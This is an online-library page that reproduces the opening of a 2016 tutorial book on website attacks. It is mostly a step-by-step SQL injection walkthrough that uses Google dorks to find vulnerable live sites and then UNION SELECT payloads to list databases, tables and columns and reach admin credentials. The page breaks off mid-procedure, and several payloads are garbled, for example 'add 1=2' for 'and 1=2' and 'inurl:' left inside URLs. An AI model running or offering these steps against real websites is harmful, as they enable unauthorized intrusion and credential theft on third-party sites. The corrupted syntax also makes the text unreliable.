Prajwal Naik - Website Attacks
Here you can read online Prajwal Naik - Website Attacks full text of the book (entire story) in english for free. Download pdf and epub, get meaning, cover and reviews about this ebook. year: 2016, publisher: UNKNOWN, genre: Computer. Description of the work, (preface) as well as reviews are available. Best literature library LitArk.com created for fans of good reading and offers a wide selection of genres:
Romance novel
Science fiction
Adventure
Detective
Science
History
Home and family
Prose
Art
Politics
Computer
Non-fiction
Religion
Business
Children
Humor
Choose a favorite category and find really read worthwhile books. Enjoy immersion in the world of imagination, feel the emotions of the characters or learn something new for yourself, make an fascinating discovery.
- Book:Website Attacks
- Author:
- Publisher:UNKNOWN
- Genre:
- Year:2016
- Rating:3 / 5
- Favourites:Add to favourites
- Your mark:
- 60
- 1
- 2
- 3
- 4
- 5
Website Attacks: summary, description and annotation
We offer to read an annotation, description, summary or preface (depends on what the author of the book "Website Attacks" wrote himself). If you haven't found the necessary information about the book — write in the comments, we will try to find it.
Website Attacks — read online for free the complete book (whole text) full work
Below is the text of the book, divided by pages. System saving the place of the last page read, allows you to conveniently read the book "Website Attacks" online for free, without having to search again every time where you left off. Put a bookmark, and you can go to the page where you finished reading at any time.
Font size:
Interval:
Bookmark:
Web ATTACKs
v1.0
4.Dos
5.BROKEN AUTHENTICATION AND SESSION MANAGEMENT
6.MISSING FUNCTION LEVEL ACCESS CONTROL
7.Cross-site request forgery
1.SQL Injection
Before starting with SQLi , we should know what SQL and database are.
Database is collection of data. In website, database is used for storing user ids,passwords,web page details,etc.
SQL used to communicate with the Database.
Some Basic Queries for SQL:
For creating data:
CREATE DATABASE is used to create a new, empty database.
DROP DATABASE is used to completely destroy an existing database.
USE is used to select a default database.
CREATE TABLE is used to create a new table, which is where your data is actually stored.
ALTER TABLE is used to modify an existing table's definition.
DROP TABLE is used to completely destroy an existing table.
SELECT is used when you want to read (or select) your data.
INSERT is used when you want to add (or insert) new data.
UPDATE is used when you want to change (or update) existing data.
DELETE is used when you want to remove (or delete) existing data.
REPLACE is used when you want to add or change (or replace) new or existing data.
*here we use manipulation of data.
what can an attacker do with SQLi?
An attacker can use SQL injection to bypass authentication .
An SQL injection vulnerability could allow the complete disclosure of data residing on a database server.
An attacker could use SQL injection to alter data stored in a database. Altering data affects data integrity and could cause repudiation issues, for instance, issues such as voiding transactions, altering balances and other records.
An attacker could use an SQL injection vulnerability to delete data from a database. Even if an appropriate backup strategy is employed, deletion of data could affect an applications availability until the database is restored.
An attacker could use SQL injection as the initial vector in an attack of an internal network that sits behind a firewall.
In short attacker can : 1. ByPass Logins
2.Access secret data
3.Modify contents of website
4,Shutting down the My SQL server
Finding vulnerable website.
1.Finding Vulnerable Website
Best tool for SQL injection is Google. We can find the Vulnerable websites using Google Dork list. google dork is searching for vulnerable websites using the google searching tricks. But we are going to use inurl: command for finding the vulnerable websites.
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
copy one of the above command and paste in the google search engine box.
Hit enter.
You can get list of web sites.
We have to visit the websites one by one for checking the vulnerability.
Eg: www.site.com/inurl:index.php?id=1
2.Checking the Vulnerability
Now check the vulnerability of website. In order to check the vulnerability ,add a single quote () at the end of the url and hit enter.
Eg: www.site.com/inurl:index.php?id=1
If the page doesnt change or showing that page not found or showing some other pages. Then it is not vulnerable.
If it showing any errors which is related to sql query, then it is vulnerable.
Ex: Warning: mysql_fetch_array() use right syntax near line 1.
3. Finding Number of columns
Now we found the website is vulnerable. Next is to find the no.of columns in the table.
For that replace the single quote() with order by x-- statement.
Change the x from 1,2,3,4,,5,6,x. Until you get the error like unknown column .
Eg: www.site.com/inurl:index.php?id=1 order by 1--
..
..3--
. 4--
www.site.com/inurl:index.php?id=1 order by 5--
If you will get error at 5 then no.of columns are x-1
I.e no.of columns 5-1 = 4.
4. Displaying the Vulnerable columns
Using union select columns query we will find the vulnerable part of the table so, replace the order by n with this statement. Change the id value to negative i.e index.php?id=-1 .Add add 1=2 before union 1=2 is false.Replace the columns with the no from 1 to x-1 separated with commas.If the no.of columns is 4 so query is should be
www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,2,3,4--
Then the page will show an error which contains numbers less than x-1 or equal to it.
Let's assume that error showing 2.
Replace the no.2 with user(). To find user column.
Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,user(),3,4--
5. Finding Version
Replace 2 with version().
www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,version(),3,4--
It's important to check version.
6. Finding table name
As i said finding version is important .if the version is 4 or below you have to guess the table name.
If you get version 5 then,
Replace the 2 with group_concat(table_name) and at the end before -- add the
from information_schema.tables where table_schema=database()
Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()--
Now you will get all table names. As we dont need all tables, select tables which is related to admin or users.
So let's now select admin table.
7. Finding column name
replace the group_concat(table_name) with the group_concat(column_name) as we have to find column. And Replace the
from information_schema.tables where table_schema=database()-- with from information_schema.columns where table_name=mysqlchar--
Find MysqlChar() for Tablename:
First of all install the HackBar addon in mozilla
goto SQL - Mysql-MysqlChar()
A window will be opened, as we selected admin table so write admin and click ok.
And it will give some code in brackets.
Copy and paste in the place of mysqlchar.
Eg: www.site.com/inurl:index.php?id=-1 add 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=CHAR(10,18,50,72)--
Now it will show the list of columns.
Ex: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password.etc.
Replace the replace group_concat(column_name) with group_concat(columnname,0x3a,another columnname).
Font size:
Interval:
Bookmark:
Similar books «Website Attacks»
Look at similar books to Website Attacks. We have selected literature similar in name and meaning in the hope of providing readers with more options to find new, interesting, not yet read works.
Discussion, reviews of the book Website Attacks and just readers' own opinions. Leave your comments, write what you think about the work, its meaning or the main characters. Specify what exactly you liked and what you didn't like, and why you think so.